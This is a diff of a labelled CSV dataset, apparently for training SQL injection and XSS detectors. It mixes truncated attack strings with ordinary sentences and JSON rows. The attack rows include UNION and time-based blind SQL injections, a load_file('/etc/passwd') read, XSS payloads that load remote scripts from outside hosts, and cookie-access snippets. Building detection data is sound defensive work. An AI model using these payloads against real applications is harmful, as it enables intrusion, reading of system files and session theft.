-"-5198 ) ) ) union all select 7089,7089,7089,7089,7",2,SQLi,19147 -1 where 2956 = 2956,2,SQLi,18365 --1662 where 1119 = 1119 or ( 8459 = 8459 ) *4906--,2,SQLi,18300 -1 or 6793 = ( select 6793 from pg_sleep ( 5 ) ),2,SQLi,18153 -Select your image.,0,normal,24892 -"<ins onmousemove=""alert(1)"">test</ins>",1,XSS,4211 -Join tables where applicable.,0,normal,23328 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,21821 -<image onpointerup=alert(1)>XSS</image>,1,XSS,8785 -""" When ""CBS All Access"" appears in the search resu",0,normal,26467 -"select sleep ( 5 ) and ( ( ""twed"" like ""twed",2,SQLi,18775 -"<plaintext onmousemove=""alert(1)"">test</plaintext>",1,XSS,6019 -"select * from users where id = 1 or "".;"" or 1 = 1 ",2,SQLi,11858 -&lt;HTML&gt;&lt;BODY&gt;,1,XSS,1029 -"-2643%"" union all select 7779,7779--",2,SQLi,18117 -<form onpointerup=alert(1)>XSS</form>,1,XSS,8464 -"<samp draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,3926 -SELECT SLEEP(5); #,2,SQLi,11355 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5778 -Select your significance.,0,normal,24880 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8731 -"1%"" ) ) ) or char ( 117 ) ||char ( 111 ) ||char ( ",2,SQLi,21457 -<style>:target {color:red;}</style><xmp id=x style,1,XSS,5563 -1%' ) ) and exp ( ~ ( select * from ( select conca,2,SQLi,20272 -<SCRIPT> alert(“XSS”); </SCRIPT>,1,XSS,1361 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5951 -"<div id=""68""><doc xmlns:xlink=""http://www.w3.org/1",1,XSS,9144 -1' ) as mvai where 5856 = 5856 and exp ( ~ ( selec,2,SQLi,12523 -Select the language you want to use for closed cap,0,normal,25592 -"<style>@keyframes slidein {}</style><base style=""a",1,XSS,4906 -"<small onclick=""alert(1)"">test</small>",1,XSS,6657 -Retrieve data where necessary.,0,normal,23284 --7600' or 7684 = 3181#,2,SQLi,20052 -<sup id=x tabindex=1 onfocus=alert(1)></sup>,1,XSS,2342 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21661 -"<;SCRIPT a=`>;` SRC="";http://ha.ckers.org/xss.js"";",1,XSS,1664 -"-1598 ) ) ) union all select 9418,9418,9418,9418,9",2,SQLi,16724 -"{""id"":null,""firstName"":""Shirley"",""lastName"":""Lim"",",0,normal,27472 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10503 -"<a href=""\x0Cjavascript:javascript:alert(1)"" id=""f",1,XSS,529 -"1%"" ( select ( case when ( 4587 = 4587 ) then rege",2,SQLi,16349 -"<datalist draggable=""true"" ondragleave=""alert(1)"">",1,XSS,2370 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20164 -select * from users where id = 11<1# union select ,2,SQLi,11648 -<image onpointerdown=alert(1)>XSS</image>,1,XSS,8288 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,13413 -"1"" ) and 6537 = dbms_pipe.receive_message ( chr ( ",2,SQLi,21658 -"<dd onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2632 -`) WHERE 1337=1337 RLIKE SLEEP(5)-- 1337,2,SQLi,11227 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8341 -<button onMouseLeave=javascript:alert(1)>,1,XSS,9633 -In 1842 he published a treatise on The Unity of th,0,normal,26023 -select ( case when ( 9343 = 9513 ) then 1 else 934,2,SQLi,18829 -"1%"" ) ) and 6283 = 2068 and ( ( ""%"" = """,2,SQLi,16491 -"-4944%"" ) ) or make_set ( 1084 = 1988,1988 ) and (",2,SQLi,16596 +"1%"" or ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,22480 +or a = a,2,SQLi,10077 +Double check that the cover you select will fit yo,0,normal,26231 +perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;ale,1,XSS,1442 +1' ) ) and ( select 9067 from ( select count ( * ),2,SQLi,17586 +1%' ) ) ) ( select ( case when ( 4587 = 4587 ) the,2,SQLi,18562 +1'+ ( select mhfn where 2425 = 2425,2,SQLi,19055 +"-9384%"" union all select 7031,7031,7031,7031,7031,",2,SQLi,12497 +1 or 8421 = ( select count ( * ) from generate_ser,2,SQLi,19145 +select,0,normal,26543 +Save up to 40% off select Mr. Beams Lighting Produ,0,normal,25712 +1%' ) ) or 5286 = ( select count ( * ) from all_us,2,SQLi,21794 +Select your trend.,0,normal,24889 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4213 +"{""id"":null,""name"":""Patrat""}",0,normal,26883 +"-3368' ) ) union all select 4913,4913,4913,4913,49",2,SQLi,21819 +"<IMG STYLE="":expr/**/ession(alert(''))"">",1,XSS,8787 +"""(F)for purposes of this Motion only, the Select C",0,normal,26464 +1%' union all select null--,2,SQLi,18773 +"<tr onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,6021 +", begin declare @var varchar ( 8000 ) set @var = '",2,SQLi,11860 +"&lt;?xml&#58;namespace prefix=\""t\"" ns=\""urn&#58;s",1,XSS,1030 +"1"" ) as qwyt where 4236 = 4236 union all select nu",2,SQLi,18115 +"<source oncontextmenu=""alert(1)"">test</source>",1,XSS,8466 +<dialog onpointerdown=alert(1)>XSS</dialog>,1,XSS,3928 +"AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000",2,SQLi,11357 +"<data onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5780 +Select your result.,0,normal,24877 +"<source oncopy=""alert(1)"" contenteditable>test</so",1,XSS,8733 +Select cafe.,0,normal,24537 +"<basefont onmouseover=""alert(1)"">test</basefont>",1,XSS,5565 +1%' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||c,2,SQLi,20270 +"<BODY ONLOAD=alert(""XSS"")>",1,XSS,1362 +<style>:target {transform: rotate(180deg);}</style,1,XSS,5953 +"<div id=""83""><x:template xmlns:x=""http://www.wapfo",1,XSS,9146 +"-6846%"" ) ) or ( 8459 = 8459 ) *4906 and ( ( ""%"" =",2,SQLi,12525 +Select the ones you wish to include in the slidesh,0,normal,25589 +<main id=x tabindex=1 ondeactivate=alert(1)></main,1,XSS,4908 +<svg><output onload=alert(1)></output>,1,XSS,6659 +"-4210"" ) where 2679 = 2679 or 4493 = utl_inaddr.ge",2,SQLi,19709 +1' ) ) or ( select 2* ( if ( ( select * from ( sel,2,SQLi,22426 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2343 +1' ) and 4822 = 6997 and ( 'ojku' = 'ojku,2,SQLi,20322 +"<;SCRIPT>;document.write("";<;SCRI"";);<;/SCRIPT>;PT",1,XSS,1665 +"1"" ) ) ) or 4915 = ( select count ( * ) from domai",2,SQLi,16722 +Select restaurant.,0,normal,24536 +UNION ALL SELECT 1,2,SQLi,10505 +"<a href=""\x0Cjavascript:javascript:alert(1)"" id=""f",1,XSS,529 +1' where 7014 = 7014 or 8466 = benchmark ( 5000000,2,SQLi,16340 +"<b onpaste=""alert(1)"" contenteditable>test</b>",1,XSS,2371 +"{""id"":null,""name"":""forth""}",0,normal,26782 +select * from users where id = '1' or \.<1 union s,2,SQLi,11650 +"<section draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,8290 +1' ) as jrqh where 6204 = 6204 and ( select * from,2,SQLi,13415 +Sort the alphabet letters.,0,normal,22759 +"<ol oncut=""alert(1)"" contenteditable>test</ol>",1,XSS,2633 +) RLIKE SLEEP(5) AND ('1337' LIKE '1337,2,SQLi,11229 +"<datalist onpaste=""alert(1)"" contenteditable>test<",1,XSS,8343 +<button onMouseOut=javascript:alert(1)>,1,XSS,9635 +"In 1849 Mr Charles Pearson, M.P., moved for a sele",0,normal,26020 +1%' ) and 8594 = ( select 8594 from pg_sleep ( 5 ),2,SQLi,18827 +1' ) ( select ( case when ( 5451 = 5451 ) then reg,2,SQLi,16489 +"-5385"" union all select 4577,4577,4577,4577,4577,4",2,SQLi,16594 "<SCRIPT a="">"" SRC=""httx://xss.rocks/xss.js""></SCRI",1,XSS,304 -"<dd onmouseup=""alert(1)"">test</dd>",1,XSS,4163 -"1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,18863 +"<textarea onmouseleave=""alert(1)"">test</textarea>",1,XSS,4165 +-4259' ) ) as usqu where 5419 = 5419 or elt ( 8325,2,SQLi,18861 "<img src=""x:gif"" onerror=""window['al\u0065rt'](0)""",1,XSS,326 -"1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||",2,SQLi,14963 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4537 -<meter onpointerenter=alert(1)>XSS</meter>,1,XSS,4598 -1 ) where 1013 = 1013 and 5573 = 9445#,2,SQLi,21479 -<body ONLOAD=document.vulnerable=true;>,1,XSS,1488 -admin' ) or '1' = '1'--,2,SQLi,11541 -"1, ( select ( case when ( 5334 = 4976 ) then 1 els",2,SQLi,22382 +"-9434"" ) as cqlw where 1600 = 1600 or 2733 = 1047-",2,SQLi,20633 +"<option onkeypress=""alert(1)"" contenteditable>test",1,XSS,4539 +<style>:target {color: red;}</style><multicol id=x,1,XSS,4600 +1 where 7890 = 7890 or sleep ( 5 ) --,2,SQLi,21477 +"<img DYNSRC=""javascript:document.vulnerable=true;""",1,XSS,1489 +"select * from users where id = 1 or ""{;"" or 1 = 1 ",2,SQLi,11543 +"-9175' ) ) union all select 6174,6174,6174,6174--",2,SQLi,22380 "ABC<div style=""x:exp\x5Cression(javascript:alert(1",1,XSS,466 -"<img src=1 onerror=""s=document.createElement('scri",1,XSS,9471 -window['a'+'l'+'e'+'r'+'t'](),1,XSS,9390 -"Select an entry, then choose Disconnect to revoke ",0,normal,25650 -"Identify, select and demonstrate understanding of ",0,normal,26060 -<style>:target {color: red;}</style><bdo id=x styl,1,XSS,4210 -Specify criteria where required.,0,normal,23267 -"<th onbeforecut=""alert(1)"" contenteditable>test</t",1,XSS,7423 -"1"" ) as jaxh where 6318 = 6318 and extractvalue ( ",2,SQLi,14904 -1' ) and sleep ( 5 ) and ( 'orxt' = 'orxt,2,SQLi,16145 -"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("""")>",1,XSS,5124 --7663' ) ) or 1558 = 1104 and ( ( 'wsrq' = 'wsrq,2,SQLi,19303 -1' ) ) ) and 3707 = ( select count ( * ) from sysi,2,SQLi,22297 -1' ) ) or 2633 = dbms_pipe.receive_message ( chr (,2,SQLi,16562 -Select map.,0,normal,24656 -Select arrive.,0,normal,24639 -#ERROR!,2,SQLi,22536 +javascript:alert('XSS');,1,XSS,9473 +"top['a'+'l'+'e'+'r'+'t'].apply(this,[1])",1,XSS,9392 +"Select and Click on ""Delete"" — you've already clea",0,normal,25647 +"{""id"":null,""firstName"":""Latte"",""lastName"":""Shu"",""s",0,normal,27552 +"<rt oncontextmenu=""alert(1)"">test</rt>",1,XSS,4212 +Determine fields where necessary.,0,normal,23264 +<summary onfocusout=alert(1) tabindex=1 id=x></sum,1,XSS,7425 +-9311 ) ) or ( 5065 = 2572 ) *2572 and ( ( 1199 = ,2,SQLi,14906 +1'+ ( select 'fqkk' where 9725 = 9725,2,SQLi,16137 +"<frame onkeydown=""alert(1)"" contenteditable>test</",1,XSS,5126 +1' ) where 6720 = 6720 or 7552 = ( select count ( ,2,SQLi,19301 +1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,22295 +"create table myfile (line varchar(8000))"" bulk ins",2,SQLi,22497 +Select discover.,0,normal,24653 +Select move.,0,normal,24636 +#ERROR!,2,SQLi,22533 "<script\x0Ctype=""text/javascript"">javascript:alert",1,XSS,357 -1' ) ) as jpxj where 6153 = 6153 or 8156 = ( selec,2,SQLi,16355 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10724 -Can you help me decide where to travel?,0,normal,23716 -"{""id"":null,""name"":""powerful""}",0,normal,27217 -"iif ( 4638 = 8258,1,1/0 )",2,SQLi,15275 -1' in boolean mode ) and 8189 = ( select count ( *,2,SQLi,12196 -I'm considering where to go for a creative class.,0,normal,23786 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2321 -"1"" or elt ( 6272 = 6272,sleep ( 5 ) ) and ""zzca"" =",2,SQLi,19086 -"<acronym draggable=""true"" ondrag=""alert(1)"">test</",1,XSS,2020 -log,0,normal,23211 --6215' ) or ( 8459 = 8459 ) *4906,2,SQLi,16226 +1'|| ( select 'kyhs' from dual where 9491 = 9491,2,SQLi,19000 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10726 +"At this point, they've all deployed it in some for",0,normal,26339 +1 ) or 8315 = ( select count ( * ) from sysibm.sys,2,SQLi,17319 +1%' and 8312 = dbms_pipe.receive_message ( chr ( 6,2,SQLi,15267 +"-9087"" order by 1#",2,SQLi,12198 +1 ) ) as xvyi where 6701 = 6701 union all select n,2,SQLi,18251 +<mark id=x tabindex=1 onfocus=alert(1)></mark>,1,XSS,2322 +1 ) order by 1#,2,SQLi,17392 +"<small draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,2021 +round,0,normal,23208 +1' ) where 2852 = 2852,2,SQLi,16252 `'><script>\xE2\x80\x8Ajavascript:alert(1)</script,1,XSS,568 -else,0,normal,23147 -Select the perfect wine for the occasion.,0,normal,22963 -<button onpointerover=alert(1)>XSS</button>,1,XSS,3511 -"1%"" and 2388 = benchmark ( 5000000,md5 ( 0x6d45715",2,SQLi,12304 -Tap to select each app that you want to hide. 5.,0,normal,25501 -"<marquee onmouseleave=""alert(1)"">test</marquee>",1,XSS,4487 -1 ) as czeu where 1738 = 1738 or exp ( ~ ( select ,2,SQLi,14405 -"1"" ) ) ) or ( select 9173 from ( select count ( * ",2,SQLi,17817 -<abbr id=x tabindex=1 ondeactivate=alert(1)></abbr,1,XSS,1946 -"-3215"" ) union all select 4457,4457,4457,4457,4457",2,SQLi,13362 -"{""id"":null,""firstName"":""Vicky"",""lastName"":""He"",""ad",0,normal,27409 -"1"" where 3434 = 3434",2,SQLi,18247 -<body onpointerenter=alert(1)>XSS</body>,1,XSS,7488 -You can then select from a drop down list on the r,0,normal,25086 -sin,0,normal,23213 -"<del draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5808 -"<body onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,2571 -<style>:target {color:red;}</style><pre id=x style,1,XSS,8915 -"1"" where 4366 = 4366 and 8312 = dbms_pipe.receive_",2,SQLi,16179 -"<code onpaste=""alert(1)"" contenteditable>test</cod",1,XSS,5009 -Up to 45% off select DeWalt Power Tools and Access,0,normal,25206 -<nav id=x tabindex=1 onfocus=alert(1)></nav>,1,XSS,6264 -1 ) as iiku where 9466 = 9466,2,SQLi,20907 -<set onpointerup=alert(1)>XSS</set>,1,XSS,2307 -1' ) as ycsr where 2238 = 2238 and 3707 = ( select,2,SQLi,13243 -"AND ELT(1337=1337,SLEEP(5)) OR '1337'='FMTE",2,SQLi,11279 -"-7433"" ) ) as zsnt where 2513 = 2513 or 4493 = utl",2,SQLi,22350 -1 and 3580 = ( select count ( * ) from domain.doma,2,SQLi,13527 --9103' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,16422 -"The Kinto Select service costs 180,000 yen, or $1,",0,normal,25419 -select,0,normal,26628 -Select first.,0,normal,24485 -"union ( select NULL, ( select @@version ) ) --",2,SQLi,11803 -<svg><main onload=alert(1)></main>,1,XSS,7763 -"<command onmouseover=""alert(1)"">test</command>",1,XSS,3284 -select ( case when ( 4297 = 9086 ) then 4297 else ,2,SQLi,21014 -‘; alert(document.cookie); var foo=’,1,XSS,1139 --1940 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,19321 -"<style>@keyframes slidein {}</style><meta style=""a",1,XSS,6575 -"1 procedure analyse ( extractvalue ( 9255,concat (",2,SQLi,15000 -<style>:target {transform: rotate(180deg);}</style,1,XSS,8303 -1' ) ) as fwxq where 9935 = 9935 or exp ( ~ ( sele,2,SQLi,19973 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,12567 -"<multicol onkeydown=""alert(1)"" contenteditable>tes",1,XSS,7804 -1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = l,2,SQLi,22271 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12008 -"<object onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,7515 -"<th onkeypress=""alert(1)"" contenteditable>test</th",1,XSS,7957 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10789 -"1%"" ) and 6414 = ( select count ( * ) from rdb$fie",2,SQLi,17014 +case,0,normal,23144 +"1"" where 9172 = 9172 or row ( 1045,7562 ) > ( sele",2,SQLi,19764 +<var id=x tabindex=1 onactivate=alert(1)></var>,1,XSS,3513 +"1' ) where 6672 = 6672 union all select null,null,",2,SQLi,12306 +TechCrunch and Facebook will select four judges fo,0,normal,25498 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4489 +"-9456%"" ) ) or 3440 = cast ( ( chr ( 113 ) ||chr (",2,SQLi,14407 +Modify records where needed.,0,normal,23439 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,1947 +"1"" ) where 2764 = 2764 rlike ( select ( case when ",2,SQLi,13364 +"{""id"":null,""name"":""press""}",0,normal,26811 +waitfor delay '0:0:5' and 'fjpf' like 'fjpf,2,SQLi,18245 +"<head onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,7490 +1%' ) ) or 8315 = ( select count ( * ) from sysibm,2,SQLi,17726 +sign,0,normal,23210 +<embed onfocusout=alert(1) tabindex=1 id=x></embed,1,XSS,5810 +<basefont id=x tabindex=1 onactivate=alert(1)></ba,1,XSS,2572 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8917 +1' ) ) ) or 9643 = ( select count ( * ) from domai,2,SQLi,16171 +"<hr ondblclick=""alert(1)"">test</hr>",1,XSS,5011 +"1' ) ) and elt ( 3053 = 9778,9778 ) and ( ( 'yfaa'",2,SQLi,16345 +<textarea id=x tabindex=1 onbeforedeactivate=alert,1,XSS,6266 +"1%"" ) ) ) or 2633 = dbms_pipe.receive_message ( ch",2,SQLi,20103 +"<listing onmouseup=""alert(1)"">test</listing>",1,XSS,2308 +1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||,2,SQLi,13245 +||(SELECT 0x4c454f67 WHERE 1337=1337 AND ELT(1337=,2,SQLi,11281 +1' where 6359 = 6359 and ( 3020 = 3020 ) *6703--,2,SQLi,17358 +"1"" ) ) and 8407 = ( select count ( * ) from genera",2,SQLi,13529 +"1"" ) where 1614 = 1614 or extractvalue ( 1297,conc",2,SQLi,16420 +I'll select the appetizer.,0,normal,24286 +select,0,normal,26625 +Select there.,0,normal,24482 +select * from users where id = 1.<@. union select ,2,SQLi,11805 +<small onpointerup=alert(1)>XSS</small>,1,XSS,7765 +<noscript id=x tabindex=1 onbeforedeactivate=alert,1,XSS,3286 +"1%"" and char ( 120 ) ||char ( 106 ) ||char ( 117 )",2,SQLi,21012 +foo\’; alert(document.cookie);//’;,1,XSS,1140 +-3997'+ ( select 'avjk' where 1917 = 1917 union al,2,SQLi,19319 +"<rb draggable=""true"" ondragstart=""alert(1)"">test</",1,XSS,6577 +"1"" ) ) as aozi where 3354 = 3354 waitfor delay '0:",2,SQLi,14993 +<svg><p onload=alert(1)></p>,1,XSS,8305 +"{""id"":8430,""firstName"":""jmeter"",""lastName"":""use in",0,normal,26809 +1 rlike ( select ( case when ( 7689 = 7689 ) then ,2,SQLi,12569 +"<style>@keyframes x{}</style><figcaption style=""an",1,XSS,7806 +-8359 ) where 4430 = 4430 or 6872 = 6872--,2,SQLi,22269 +"select * from users where id = 1 or 1#"" ( union se",2,SQLi,12010 +<samp id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,7517 +"<mark onclick=""alert(1)"">test</mark>",1,XSS,7959 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10791 +-6129 ) as vuze where 1565 = 1565 or ( 8459 = 8459,2,SQLi,17691 <form><button formaction=javascript:alert(1)>XSS,1,XSS,159 -"1"" ) ) and sleep ( 5 ) #",2,SQLi,20635 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10645 -I'm thinking about where to have a picnic.,0,normal,23798 -"<cite onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,6703 -"{""id"":null,""firstName"":""Shane"",""lastName"":""Lee"",""a",0,normal,26996 -1 or exp ( ~ ( select * from ( select concat ( 0x7,2,SQLi,17245 -"<rt onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,2061 +"1%"" ) ) union all select null,null,null--",2,SQLi,19823 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10647 +"{""id"":null,""name"":""Victini""}",0,normal,27446 +<set onpointerdown=alert(1)>XSS</set>,1,XSS,6705 +"{""id"":null,""firstName"":""Anuar"",""lastName"":""Haron"",",0,normal,26993 +"1%"" ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr",2,SQLi,17243 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2062 "<embed src=""http://corkami.googlecode.com/svn/!svn",1,XSS,882 -"1%' ) and elt ( 4670 = 9403,9403 ) and ( '%' = '",2,SQLi,14064 -"select * from users where id = 1 or "", ( "" or 1 = ",2,SQLi,11500 -I need to select the right book for my reading lis,0,normal,23708 -"Select Entry Copy User ID or Copy Password, then p",0,normal,25630 -"<sup oncontextmenu=""alert(1)"">test</sup>",1,XSS,4960 -"<legend onkeyup=""alert(1)"" contenteditable>test</l",1,XSS,7051 -<pre id=x tabindex=1 onfocusin=alert(1)></pre>,1,XSS,4884 --2174' ) ) or 5903 = ( 'qqpjq'|| ( select case 590,2,SQLi,18404 -1 or sleep ( 5 ),2,SQLi,16028 -"<input onclick=""alert(1)"">test</input>",1,XSS,6763 -"<style>@keyframes slidein {}</style><label style=""",1,XSS,6616 -1' where 4880 = 4880 and ( select 2* ( if ( ( sele,2,SQLi,17449 -"<rt draggable=""true"" ondragend=""alert(1)"">test</rt",1,XSS,4803 -Select with enthusiasm.,0,normal,24442 -1 ) as fxfe where 1148 = 1148 or ( select * from (,2,SQLi,19060 -"<style>@keyframes slidein {}</style><menu style=""a",1,XSS,6300 -"<kbd oncopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,4180 -"1' ) ) and elt ( 4460 = 2665,2665 ) and ( ( 'qmzu'",2,SQLi,19655 -"<col draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,6506 -<embed src=/ onload=alert(1)>,1,XSS,8601 -"1"" where 2131 = 2131 and 6055 = ctxsys.drithsx.sn ",2,SQLi,17648 -Select your influence.,0,normal,24874 -1 ) as tgqd where 6369 = 6369 and 6055 = ctxsys.dr,2,SQLi,14732 -and 1 in ( select var from temp ) --,2,SQLi,11520 -"<section oncontextmenu=""alert(1)"">test</section>",1,XSS,7750 -"<footer onmouseenter=""alert(1)"">test</footer>",1,XSS,2059 -select,0,normal,26631 -Greater London (in the sense in which that name mi,0,normal,26131 -"<caption draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,8851 --4523 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,13291 -Select a scenic view for your landscape.,0,normal,22989 -<command onpointerdown=alert(1)>XSS</command>,1,XSS,7076 -from,0,normal,26516 -1'+ ( select bfeq where 3445 = 3445 and 9198 = 919,2,SQLi,21942 -<em onpointerleave=alert(1)>XSS</em>,1,XSS,8737 -<plaintext onpointerup=alert(1)>XSS</plaintext>,1,XSS,6340 --1564' ) order by 1--,2,SQLi,14691 -"1' ) where 2802 = 2802 union all select null,null,",2,SQLi,21584 -"<tfoot draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,5822 -"<data onmouseleave=""alert(1)"">test</data>",1,XSS,8620 -"<progress onmouseout=""alert(1)"">test</progress>",1,XSS,4717 -1 ) ) and ( select * from ( select ( sleep ( 5 ) ),2,SQLi,19114 -<style>:target {color:red;}</style><blockquote id=,1,XSS,2216 -"<tt onkeyup=""alert(1)"" contenteditable>test</tt>",1,XSS,6995 --1910' or 2624 = 3371 and 'umoy' = 'umoy,2,SQLi,13603 -1 or sleep ( 5 ) #,2,SQLi,18548 -") RLIKE SLEEP(5) AND (1337"" LIKE ""1337",2,SQLi,11238 -"<video onerror=""javascript:alert(1)""><source>//INJ",1,XSS,9840 -<script>a=/XSS/\ndocument.vulnerable=true;</script,1,XSS,1483 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10528 -concatenate,0,normal,23224 -"{""id"":null,""firstName"":""Xie"",""lastName"":""Jinhuang""",0,normal,26815 -; if not(select system_user) <> 'sa' waitfor delay,2,SQLi,11136 -end and 'huti' like 'huti,2,SQLi,14733 -<rp id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,6049 -<b onfocusout=alert(1) tabindex=1 id=x></b><input ,1,XSS,6633 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,15106 -<center id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5445 -1' where 9994 = 9994 and 9660 = ( select count ( *,2,SQLi,17530 -"1"" where 2452 = 2452",2,SQLi,13772 -select case when 5559 = 3483 then 1 else null end-,2,SQLi,15075 -`'><script>\xE2\x80\x85javascript:alert(509)</scri,1,XSS,8979 -1' and exp ( ~ ( select * from ( select concat ( 0,2,SQLi,21409 -"-7851"" ) ) or 6872 = 6872 and ( ( ""dvbw"" like ""dvb",2,SQLi,21812 -1' in boolean mode ) or 5356 = ( select count ( * ,2,SQLi,18677 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8562 -"He evinced, as premier of the Cape Colony, the sam",0,normal,26122 -<object id=x onfocusin=alert(1) type=text/html>,1,XSS,2549 -declare @s varchar ( 22 ) select @s =,2,SQLi,11633 +( select char ( 113 ) +char ( 113 ) +char ( 112 ) ,2,SQLi,14066 +"union select 1,load_file ( '/etc/passwd' ) ,1,1,1;",2,SQLi,11502 +I want to choose a new book to read.,0,normal,23705 +1 ) as ztrb where 1052 = 1052 and ( select * from ,2,SQLi,20499 +<textarea onpaste=alert(1) autofocus></textarea>,1,XSS,4962 +<link onpointerout=alert(1)>XSS</link>,1,XSS,7053 +"<header onmousedown=""alert(1)"">test</header>",1,XSS,4886 +"1"" ) ) as dooi where 1806 = 1806 and 6414 = ( sele",2,SQLi,18402 +select ( case when ( 3325 = 1767 ) then 3325 else ,2,SQLi,16190 +"<video draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,6765 +"<picture onbeforepaste=""alert(1)"" contenteditable>",1,XSS,6618 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,17111 +<legend onpointerleave=alert(1)>XSS</legend>,1,XSS,4805 +Select your council.,0,normal,24869 +1' where 8231 = 8231,2,SQLi,19058 +<xmp id=x tabindex=1 onfocusin=alert(1)></xmp>,1,XSS,6302 +<p onpointermove=alert(1)>XSS</p>,1,XSS,4182 +"1' where 2964 = 2964 union all select null,null,nu",2,SQLi,19653 +"<thead onclick=""alert(1)"">test</thead>",1,XSS,6508 +"<shadow onmouseout=""alert(1)"">test</shadow>",1,XSS,8603 +"{""id"":null,""firstName"":""Jin Le Joyce"",""lastName"":""",0,normal,27176 +"1"" ) ) as sqow where 8752 = 8752",2,SQLi,15415 +-7346 or 8571 = 8571--,2,SQLi,14734 +AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11522 +"<abbr oncut=""alert(1)"" contenteditable>test</abbr>",1,XSS,7752 +"<canvas onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,2060 +"1%"" ) ) ) or 8315 = ( select count ( * ) from sysi",2,SQLi,22414 +1 and 9660 = ( select count ( * ) from all_users t,2,SQLi,20078 +<option onpointerleave=alert(1)>XSS</option>,1,XSS,8853 +"1' in boolean mode ) and row ( 6237,7469 ) > ( sel",2,SQLi,13293 +Where's the field defined?,0,normal,23379 +"<meta draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,7078 +"1, ( select ( case when ( 1570 = 1570 ) then ( sel",2,SQLi,18085 +1' ) ) as yefv where 4263 = 4263,2,SQLi,21940 +<dl onpointerover=alert(1)>XSS</dl>,1,XSS,8739 +<dt id=x tabindex=1 onfocusin=alert(1)></dt>,1,XSS,6342 +"-7060' ) or make_set ( 4233 = 1689,1689 ) and ( 't",2,SQLi,14693 +1 or ( select 2* ( if ( ( select * from ( select c,2,SQLi,21582 +"<nav onmouseenter=""alert(1)"">test</nav>",1,XSS,5824 +"<nobr draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,8622 +"<dt oncut=""alert(1)"" contenteditable>test</dt>",1,XSS,4719 +#ERROR!,2,SQLi,22526 +<style>:target {color:red;}</style><rt id=x style=,1,XSS,2217 +"<track draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,6997 +"select sleep ( 5 ) and ( ""%"" = """,2,SQLi,13605 +1 ) as zmjm where 9125 = 9125 or char ( 68 ) ||cha,2,SQLi,18546 +"))) RLIKE SLEEP(5) AND (((1337"" LIKE ""1337",2,SQLi,11240 +<input autofocus onfocus=alert(1)>//INJECTX,1,XSS,9842 +"\"";document.vulnerable=true;;//",1,XSS,1484 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10530 +radians,0,normal,23221 +1' and 6414 = ( select count ( * ) from rdb$fields,2,SQLi,19759 